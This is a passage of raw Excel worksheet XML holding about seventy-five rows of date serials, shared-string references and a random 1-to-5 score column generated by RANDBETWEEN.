      </c>
      <c r="C11911" t="s">
        <v>2192</v>
      </c>
      <c r="D11911" t="s">
        <v>7</v>
      </c>
      <c r="E11911" s="2" t="s">
        <v>10688</v>
      </c>
      <c r="F11911">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11912" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A11912" s="1">
        <v>43311.377824074072</v>
      </c>
      <c r="C11912" t="s">
        <v>10</v>
      </c>
      <c r="D11912" t="s">
        <v>632</v>
      </c>
      <c r="E11912" s="2" t="s">
        <v>10689</v>
      </c>
      <c r="F11912">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11913" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11913" s="1">
        <v>43311.375555555554</v>
      </c>
      <c r="C11913" t="s">
        <v>2452</v>
      </c>
      <c r="D11913" t="s">
        <v>94</v>
      </c>
      <c r="E11913" s="2" t="s">
        <v>10690</v>
      </c>
      <c r="F11913">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11914" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11914" s="1">
        <v>43311.374421296299</v>
      </c>
      <c r="C11914" t="s">
        <v>477</v>
      </c>
      <c r="E11914" t="s">
        <v>10691</v>
      </c>
      <c r="F11914">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11915" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11915" s="1">
        <v>43311.369942129626</v>
      </c>
      <c r="C11915" t="s">
        <v>48</v>
      </c>
      <c r="E11915" t="s">
        <v>10692</v>
      </c>
      <c r="F11915">
        <f t="shared" ca="1" si="186"/>
        <v>3</v>
      </c>
    </row>
    <row r="11916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11916" s="1">
        <v>43311.36991898148</v>
      </c>
      <c r="C11916" t="s">
        <v>43</v>
      </c>
      <c r="E11916" t="s">
        <v>10693</v>
      </c>
      <c r="F11916">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11917" s="1">
        <v>43311.368541666663</v>
      </c>
      <c r="C11917" t="s">
        <v>10</v>
      </c>
      <c r="D11917" t="s">
        <v>17</v>
      </c>
      <c r="E11917" t="s">
        <v>10694</v>
      </c>
      <c r="F11917">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11918" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11918" s="1">
        <v>43311.366168981483</v>
      </c>
      <c r="C11918" t="s">
        <v>6</v>
      </c>
      <c r="D11918" t="s">
        <v>114</v>
      </c>
      <c r="E11918" t="s">
        <v>10695</v>
      </c>
      <c r="F11918">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11919" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11919" s="1">
        <v>43311.362256944441</v>
      </c>
      <c r="C11919" t="s">
        <v>3027</v>
      </c>
      <c r="D11919" t="s">
        <v>480</v>
      </c>
      <c r="E11919" s="2" t="s">
        <v>10696</v>
      </c>
      <c r="F11919">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11920" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11920" s="1">
        <v>43311.354641203703</v>
      </c>
      <c r="C11920" t="s">
        <v>1377</v>
      </c>
      <c r="E11920" s="2" t="s">
        <v>10697</v>
      </c>
      <c r="F11920">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11921" s="1">
        <v>43311.351898148147</v>
      </c>
      <c r="C11921" t="s">
        <v>10</v>
      </c>
      <c r="D11921" t="s">
        <v>17</v>
      </c>
      <c r="E11921" t="s">
        <v>10698</v>
      </c>
      <c r="F11921">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11922" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11922" s="1">
        <v>43311.316435185188</v>
      </c>
      <c r="C11922" t="s">
        <v>10088</v>
      </c>
      <c r="D11922" t="s">
        <v>271</v>
      </c>
      <c r="E11922" s="2" t="s">
        <v>10699</v>
      </c>
      <c r="F11922">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11923" s="1">
        <v>43311.315717592595</v>
      </c>
      <c r="C11923" t="s">
        <v>48</v>
      </c>
      <c r="E11923" t="s">
        <v>10700</v>
      </c>
      <c r="F11923">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11924" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11924" s="1">
        <v>43311.303946759261</v>
      </c>
      <c r="C11924" t="s">
        <v>477</v>
      </c>
      <c r="E11924">
        <v>862264030384555</v>
      </c>
      <c r="F11924">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11925" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11925" s="1">
        <v>43311.30064814815</v>
      </c>
      <c r="C11925" t="s">
        <v>271</v>
      </c>
      <c r="D11925" t="s">
        <v>56</v>
      </c>
      <c r="E11925" s="2" t="s">
        <v>10701</v>
      </c>
      <c r="F11925">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11926" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A11926" s="1">
        <v>43311.28601851852</v>
      </c>
      <c r="C11926" t="s">
        <v>10</v>
      </c>
      <c r="D11926" t="s">
        <v>6</v>
      </c>
      <c r="E11926" s="2" t="s">
        <v>8750</v>
      </c>
      <c r="F11926">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11927" s="1">
        <v>43311.274699074071</v>
      </c>
      <c r="C11927" t="s">
        <v>197</v>
      </c>
      <c r="F11927">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11928" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11928" s="1">
        <v>43311.271666666667</v>
      </c>
      <c r="C11928" t="s">
        <v>43</v>
      </c>
      <c r="E11928" s="2" t="s">
        <v>10702</v>
      </c>
      <c r="F11928">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11929" s="1">
        <v>43311.259259259263</v>
      </c>
      <c r="C11929" t="s">
        <v>10</v>
      </c>
      <c r="D11929" t="s">
        <v>89</v>
      </c>
      <c r="E11929" t="s">
        <v>10703</v>
      </c>
      <c r="F11929">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11930" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11930" s="1">
        <v>43311.258113425924</v>
      </c>
      <c r="C11930" t="s">
        <v>10295</v>
      </c>
      <c r="D11930" t="s">
        <v>46</v>
      </c>
      <c r="E11930" s="2" t="s">
        <v>10704</v>
      </c>
      <c r="F11930">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11931" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11931" s="1">
        <v>43311.243668981479</v>
      </c>
      <c r="C11931" t="s">
        <v>2147</v>
      </c>
      <c r="D11931" t="s">
        <v>80</v>
      </c>
      <c r="E11931" s="2" t="s">
        <v>10705</v>
      </c>
      <c r="F11931">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11932" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A11932" s="1">
        <v>43311.24077546296</v>
      </c>
      <c r="C11932" t="s">
        <v>50</v>
      </c>
      <c r="E11932" s="2" t="s">
        <v>10706</v>
      </c>
      <c r="F11932">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11933" s="1">
        <v>43311.20648148148</v>
      </c>
      <c r="C11933" t="s">
        <v>140</v>
      </c>
      <c r="D11933" t="s">
        <v>141</v>
      </c>
      <c r="E11933" t="s">
        <v>10707</v>
      </c>
      <c r="F11933">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11934" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11934" s="1">
        <v>43311.205034722225</v>
      </c>
      <c r="C11934" t="s">
        <v>10623</v>
      </c>
      <c r="D11934" t="s">
        <v>71</v>
      </c>
      <c r="E11934" s="2" t="s">
        <v>10708</v>
      </c>
      <c r="F11934">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11935" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A11935" s="1">
        <v>43311.19153935185</v>
      </c>
      <c r="C11935" t="s">
        <v>69</v>
      </c>
      <c r="E11935" s="2" t="s">
        <v>10709</v>
      </c>
      <c r="F11935">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11936" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11936" s="1">
        <v>43311.162951388891</v>
      </c>
      <c r="C11936" t="s">
        <v>2192</v>
      </c>
      <c r="D11936" t="s">
        <v>7</v>
      </c>
      <c r="E11936" s="2" t="s">
        <v>10710</v>
      </c>
      <c r="F11936">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11937" s="1">
        <v>43311.161354166667</v>
      </c>
      <c r="C11937" t="s">
        <v>542</v>
      </c>
      <c r="D11937" t="s">
        <v>39</v>
      </c>
      <c r="E11937" t="s">
        <v>9877</v>
      </c>
      <c r="F11937">
        <f t="shared" ca="1" si="186"/>
        <v>3</v>
      </c>
    </row>
    <row r="11938" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11938" s="1">
        <v>43311.161076388889</v>
      </c>
      <c r="C11938" t="s">
        <v>71</v>
      </c>
      <c r="E11938" s="2" t="s">
        <v>10711</v>
      </c>
      <c r="F11938">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11939" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A11939" s="1">
        <v>43311.1409375</v>
      </c>
      <c r="C11939" t="s">
        <v>10</v>
      </c>
      <c r="D11939" t="s">
        <v>6</v>
      </c>
      <c r="E11939" s="2" t="s">
        <v>6998</v>
      </c>
      <c r="F11939">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11940" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11940" s="1">
        <v>43311.136388888888</v>
      </c>
      <c r="C11940" t="s">
        <v>318</v>
      </c>
      <c r="E11940" t="s">
        <v>10712</v>
      </c>
      <c r="F11940">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11941" s="1">
        <v>43311.120289351849</v>
      </c>
      <c r="C11941" t="s">
        <v>817</v>
      </c>
      <c r="D11941" t="s">
        <v>80</v>
      </c>
      <c r="E11941" t="s">
        <v>10713</v>
      </c>
      <c r="F11941">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11942" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A11942" s="1">
        <v>43311.069479166668</v>
      </c>
      <c r="C11942" t="s">
        <v>29</v>
      </c>
      <c r="D11942" t="s">
        <v>494</v>
      </c>
      <c r="E11942" s="2" t="s">
        <v>10714</v>
      </c>
      <c r="F11942">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11943" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11943" s="1">
        <v>43311.020046296297</v>
      </c>
      <c r="C11943" t="s">
        <v>2192</v>
      </c>
      <c r="D11943" t="s">
        <v>7</v>
      </c>
      <c r="E11943" s="2" t="s">
        <v>10715</v>
      </c>
      <c r="F11943">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11944" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11944" s="1">
        <v>43311.007233796299</v>
      </c>
      <c r="C11944" t="s">
        <v>1050</v>
      </c>
      <c r="D11944" t="s">
        <v>46</v>
      </c>
      <c r="E11944" s="2" t="s">
        <v>10716</v>
      </c>
      <c r="F11944">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11945" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A11945" s="1">
        <v>43310.996712962966</v>
      </c>
      <c r="C11945" t="s">
        <v>29</v>
      </c>
      <c r="D11945" t="s">
        <v>41</v>
      </c>
      <c r="E11945" s="2" t="s">
        <v>10717</v>
      </c>
      <c r="F11945">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11946" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A11946" s="1">
        <v>43310.99591435185</v>
      </c>
      <c r="C11946" t="s">
        <v>7491</v>
      </c>
      <c r="D11946" t="s">
        <v>92</v>
      </c>
      <c r="E11946" s="2" t="s">
        <v>10718</v>
      </c>
      <c r="F11946">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11947" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11947" s="1">
        <v>43310.974027777775</v>
      </c>
      <c r="C11947" t="s">
        <v>2192</v>
      </c>
      <c r="D11947" t="s">
        <v>7</v>
      </c>
      <c r="E11947" s="2" t="s">
        <v>10719</v>
      </c>
      <c r="F11947">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11948" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11948" s="1">
        <v>43310.973969907405</v>
      </c>
      <c r="C11948" t="s">
        <v>2192</v>
      </c>
      <c r="D11948" t="s">
        <v>7</v>
      </c>
      <c r="E11948" s="2" t="s">
        <v>10720</v>
      </c>
      <c r="F11948">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11949" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11949" s="1">
        <v>43310.973958333336</v>
      </c>
      <c r="C11949" t="s">
        <v>2192</v>
      </c>
      <c r="D11949" t="s">
        <v>7</v>
      </c>
      <c r="E11949" s="2" t="s">
        <v>10721</v>
      </c>
      <c r="F11949">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11950" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11950" s="1">
        <v>43310.973379629628</v>
      </c>
      <c r="C11950" t="s">
        <v>10</v>
      </c>
      <c r="D11950" t="s">
        <v>89</v>
      </c>
      <c r="E11950" t="s">
        <v>10722</v>
      </c>
      <c r="F11950">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11951" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A11951" s="1">
        <v>43310.955659722225</v>
      </c>
      <c r="C11951" t="s">
        <v>156</v>
      </c>
      <c r="D11951" t="s">
        <v>46</v>
      </c>
      <c r="E11951" s="2" t="s">
        <v>10723</v>
      </c>
      <c r="F11951">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11952" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11952" s="1">
        <v>43310.944155092591</v>
      </c>
      <c r="C11952" t="s">
        <v>2192</v>
      </c>
      <c r="D11952" t="s">
        <v>7</v>
      </c>
      <c r="E11952" s="2" t="s">
        <v>10724</v>
      </c>
      <c r="F11952">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11953" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A11953" s="1">
        <v>43310.908379629633</v>
      </c>
      <c r="C11953" t="s">
        <v>140</v>
      </c>
      <c r="D11953" t="s">
        <v>847</v>
      </c>
      <c r="E11953" s="2" t="s">
        <v>10725</v>
      </c>
      <c r="F11953">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11954" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A11954" s="1">
        <v>43310.883090277777</v>
      </c>
      <c r="C11954" t="s">
        <v>140</v>
      </c>
      <c r="D11954" t="s">
        <v>234</v>
      </c>
      <c r="E11954" s="2" t="s">
        <v>10726</v>
      </c>
      <c r="F11954">
        <f t="shared" ca="1" si="186"/>
        <v>3</v>
      </c>
    </row>
    <row r="11955" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11955" s="1">
        <v>43310.872824074075</v>
      </c>
      <c r="C11955" t="s">
        <v>2192</v>
      </c>
      <c r="D11955" t="s">
        <v>7</v>
      </c>
      <c r="E11955" s="2" t="s">
        <v>10727</v>
      </c>
      <c r="F11955">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11956" s="1">
        <v>43310.728333333333</v>
      </c>
      <c r="C11956" t="s">
        <v>10</v>
      </c>
      <c r="D11956" t="s">
        <v>163</v>
      </c>
      <c r="E11956" t="s">
        <v>10728</v>
      </c>
      <c r="F11956">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11957" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11957" s="1">
        <v>43310.716898148145</v>
      </c>
      <c r="C11957" t="s">
        <v>1064</v>
      </c>
      <c r="D11957" t="s">
        <v>1993</v>
      </c>
      <c r="E11957" t="s">
        <v>10507</v>
      </c>
      <c r="F11957">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11958" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A11958" s="1">
        <v>43310.673101851855</v>
      </c>
      <c r="C11958" t="s">
        <v>10</v>
      </c>
      <c r="D11958" t="s">
        <v>151</v>
      </c>
      <c r="E11958" s="2" t="s">
        <v>10729</v>
      </c>
      <c r="F11958">
        <f t="shared" ca="1" si="186"/>
        <v>3</v>
      </c>
    </row>
    <row r="11959" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A11959" s="1">
        <v>43310.586261574077</v>
      </c>
      <c r="C11959" t="s">
        <v>48</v>
      </c>
      <c r="E11959" s="2" t="s">
        <v>10730</v>
      </c>
      <c r="F11959">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11960" s="1">
        <v>43310.538356481484</v>
      </c>
      <c r="C11960" t="s">
        <v>48</v>
      </c>
      <c r="E11960" t="s">
        <v>10731</v>
      </c>
      <c r="F11960">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11961" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11961" s="1">
        <v>43310.295844907407</v>
      </c>
      <c r="C11961" t="s">
        <v>43</v>
      </c>
      <c r="D11961" t="s">
        <v>229</v>
      </c>
      <c r="E11961" s="2" t="s">
        <v>10732</v>
      </c>
      <c r="F11961">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11962" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A11962" s="1">
        <v>43310.257407407407</v>
      </c>
      <c r="C11962" t="s">
        <v>7491</v>
      </c>
      <c r="D11962" t="s">
        <v>993</v>
      </c>
      <c r="E11962" s="2" t="s">
        <v>10733</v>
      </c>
      <c r="F11962">
        <f t="shared" ca="1" si="186"/>
        <v>4</v>
      </c>
    </row>
    <row r="11963" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11963" s="1">
        <v>43310.173611111109</v>
      </c>
      <c r="C11963" t="s">
        <v>10735</v>
      </c>
      <c r="D11963" t="s">
        <v>41</v>
      </c>
      <c r="E11963" t="s">
        <v>10734</v>
      </c>
      <c r="F11963">
        <f t="shared" ca="1" si="186"/>
        <v>5</v>
      </c>
    </row>
    <row r="11964" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A11964" s="1">
        <v>43310.166655092595</v>
      </c>
      <c r="C11964" t="s">
        <v>118</v>
      </c>
      <c r="D11964" t="s">
        <v>271</v>
      </c>
      <c r="E11964" s="2" t="s">
        <v>10736</v>
      </c>
      <c r="F11964">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11965" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11965" s="1">
        <v>43310.142083333332</v>
      </c>
      <c r="C11965" t="s">
        <v>1068</v>
      </c>
      <c r="E11965" t="s">
        <v>10737</v>
      </c>
      <c r="F11965">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11966" s="1">
        <v>43310.135150462964</v>
      </c>
      <c r="C11966" t="s">
        <v>454</v>
      </c>
      <c r="D11966" t="s">
        <v>36</v>
      </c>
      <c r="E11966" t="s">
        <v>10738</v>
      </c>
      <c r="F11966">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11967" s="1">
        <v>43310.104409722226</v>
      </c>
      <c r="C11967" t="s">
        <v>3106</v>
      </c>
      <c r="D11967" t="s">
        <v>11</v>
      </c>
      <c r="E11967" t="s">
        <v>10739</v>
      </c>
      <c r="F11967">
        <f t="shared" ca="1" si="186"/>
        <v>2</v>
      </c>
    </row>
    <row r="11968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11968" s="1">
        <v>43310.080821759257</v>
      </c>
      <c r="C11968" t="s">
        <v>3106</v>
      </c>
      <c r="D11968" t="s">
        <v>290</v>
      </c>
      <c r="E11968" t="s">
        <v>10740</v>
      </c>
      <c r="F11968">
        <f t="shared" ca="1" si="186"/>
        <v>3</v>
      </c>
    </row>
    <row r="11969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11969" s="1">
        <v>43310.024386574078</v>
      </c>
      <c r="C11969" t="s">
        <v>10735</v>
      </c>
      <c r="D11969" t="s">
        <v>480</v>
      </c>
      <c r="E11969" t="s">
        <v>10734</v>
      </c>
      <c r="F11969">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11970" s="1">
        <v>43309.996307870373</v>
      </c>
      <c r="C11970" t="s">
        <v>3106</v>
      </c>
      <c r="D11970" t="s">
        <v>667</v>
      </c>
      <c r="E11970" t="s">
        <v>10741</v>
      </c>
      <c r="F11970">
        <f t="shared" ref="F11970:F12033" ca="1" si="187">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="11971" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11971" s="1">
        <v>43309.91988425926</v>
      </c>
      <c r="C11971" t="s">
        <v>2986</v>
      </c>
      <c r="D11971" t="s">
        <v>993</v>
      </c>
      <c r="E11971" s="2" t="s">
        <v>10742</v>
      </c>
      <c r="F11971">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="11972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11972" s="1">
        <v>43309.913506944446</v>
      </c>
      <c r="C11972" t="s">
        <v>3106</v>
      </c>
      <c r="D11972" t="s">
        <v>39</v>
      </c>
      <c r="E11972" t="s">
        <v>10743</v>
      </c>
      <c r="F11972">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="11973" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11973" s="1">
        <v>43309.86613425926</v>
      </c>
      <c r="C11973" t="s">
        <v>9633</v>
      </c>
      <c r="D11973" t="s">
        <v>56</v>
      </c>
      <c r="E11973" s="2" t="s">
        <v>10744</v>
      </c>
      <c r="F11973">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="11974" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11974" s="1">
        <v>43309.857939814814</v>
      </c>
      <c r="C11974" t="s">
        <v>2192</v>
      </c>
      <c r="D11974" t="s">
        <v>7</v>
      </c>
      <c r="E11974" s="2" t="s">
        <v>10745</v>
      </c>
      <c r="F11974">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="11975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11975" s="1">
        <v>43309.844398148147</v>
      </c>
      <c r="C11975" t="s">
        <v>10735</v>
      </c>
      <c r="D11975" t="s">
        <v>713</v>
      </c>
      <c r="E11975" t="s">
        <v>10734</v>
      </c>
      <c r="F11975">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="11976" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11976" s="1">
        <v>43309.76048611111</v>
      </c>
      <c r="C11976" t="s">
        <v>454</v>
      </c>
      <c r="D11976" t="s">
        <v>602</v>
      </c>
      <c r="E11976" t="s">
        <v>10746</v>
      </c>
      <c r="F11976">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="11977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11977" s="1">
        <v>43309.651122685187</v>
      </c>
      <c r="C11977" t="s">
        <v>10</v>
      </c>
      <c r="D11977" t="s">
        <v>107</v>
      </c>
      <c r="E11977" t="s">
        <v>10747</v>
      </c>
      <c r="F11977">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="11978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11978" s="1">
        <v>43309.622604166667</v>
      </c>
      <c r="C11978" t="s">
        <v>454</v>
      </c>
      <c r="D11978" t="s">
        <v>817</v>
      </c>
      <c r="E11978" t="s">
        <v>10748</v>
      </c>
      <c r="F11978">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="11979" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11979" s="1">
        <v>43309.621122685188</v>
      </c>
      <c r="C11979" t="s">
        <v>454</v>
      </c>
      <c r="D11979" t="s">
        <v>374</v>
      </c>
      <c r="E11979" t="s">
        <v>10746</v>
      </c>
      <c r="F11979">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="11980" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11980" s="1">
        <v>43309.606342592589</v>
      </c>
      <c r="C11980" t="s">
        <v>731</v>
      </c>
      <c r="D11980" t="s">
        <v>52</v>
      </c>
      <c r="E11980" s="2" t="s">
        <v>10749</v>
      </c>
      <c r="F11980">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="11981" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11981" s="1">
        <v>43309.583981481483</v>
      </c>
      <c r="C11981" t="s">
        <v>158</v>
      </c>
      <c r="D11981" t="s">
        <v>124</v>
      </c>
      <c r="E11981" s="2" t="s">
        <v>10750</v>
      </c>
      <c r="F11981">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="11982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11982" s="1">
        <v>43309.535486111112</v>
      </c>
      <c r="C11982" t="s">
        <v>454</v>
      </c>
      <c r="D11982" t="s">
        <v>52</v>
      </c>
      <c r="E11982" t="s">
        <v>10738</v>
      </c>
      <c r="F11982">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="11983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11983" s="1">
        <v>43309.514687499999</v>
      </c>
      <c r="C11983" t="s">
        <v>454</v>
      </c>
      <c r="D11983" t="s">
        <v>632</v>
      </c>
      <c r="E11983" t="s">
        <v>10738</v>
      </c>
      <c r="F11983">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="11984" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11984" s="1">
        <v>43309.493750000001</v>
      </c>
      <c r="C11984" t="s">
        <v>2192</v>
      </c>
      <c r="D11984" t="s">
        <v>7</v>
      </c>
      <c r="E11984" s="2" t="s">
        <v>10751</v>
      </c>
      <c r="F11984">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="11985" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11985" s="1">
        <v>43309.467222222222</v>
      </c>
      <c r="C11985" t="s">
        <v>6</v>
      </c>
      <c r="D11985" t="s">
        <v>114</v>
      </c>
      <c r="E11985" t="s">
        <v>10752</v>
      </c>
      <c r="F11985">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="11986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11986" s="1">
        <v>43309.460995370369</v>
      </c>
      <c r="C11986" t="s">
        <v>3106</v>
      </c>
      <c r="D11986" t="s">
        <v>480</v>
      </c>
      <c r="E11986" t="s">
        <v>10753</v>
      </c>
      <c r="F11986">
